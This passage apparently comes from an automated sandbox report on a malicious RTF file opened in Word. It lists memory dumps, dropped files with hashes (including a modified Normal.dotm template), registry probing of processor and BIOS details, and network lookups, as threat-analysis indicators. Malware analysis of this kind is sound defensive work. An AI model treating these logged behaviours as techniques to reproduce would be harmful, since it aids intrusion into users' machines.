memory/1868-159-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-161-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-163-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-165-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-167-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-169-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1868-171-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-173-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2752-176-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1868-175-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-178-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-179-0x0000000000400000-0x0000000000482000-memory.dmp

memory/564-180-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1868-181-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-182-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-183-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-184-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-186-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2844-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2844-189-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2988-194-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2844-196-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2844-193-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2988-201-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2844-202-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2648-206-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2648-211-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2988-210-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2648-213-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2988-209-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2988-205-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2648-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2844-199-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2844-198-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2648-216-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2648-215-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2648-217-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\veskna

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2844-222-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1868-224-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-225-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-226-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1868-229-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1868-231-0x0000000010000000-0x0000000010019000-memory.dmp

memory/2988-233-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1868-234-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-235-0x0000000010000000-0x0000000010019000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 2dd9c0928d9060af4fe82cab7bd8f91c
SHA1 be44fbad32272d2719bb64270064ebb327c878c2
SHA256 3e8c35604ed926ea48315a11e79af593f4eace6a5ac8547e3e20572e1840ec1f
SHA512 32f934820af9641e7c3ab0396b9a2a330c468be1e77eb650a4ac5ce7854c32de9b54e8849e5fc318a9dbf6446044cc063b3faeaa8f30e8e313691408c07c4ecb

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-30 08:30

Reported

2024-03-30 08:32

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

155s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b5b2948d407676eab86b1152e7ce5ec4.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b5b2948d407676eab86b1152e7ce5ec4.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/4288-0-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-1-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-3-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-2-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-4-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-5-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-7-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-6-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-8-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-9-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-10-0x00007FFB3F610000-0x00007FFB3F620000-memory.dmp

memory/4288-11-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-13-0x00007FFB3F610000-0x00007FFB3F620000-memory.dmp

memory/4288-14-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-15-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-12-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-17-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-16-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-19-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-20-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-33-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-34-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-35-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-58-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-59-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-60-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-61-0x00007FFB41770000-0x00007FFB41780000-memory.dmp

memory/4288-62-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp

memory/4288-63-0x00007FFB816F0000-0x00007FFB818E5000-memory.dmp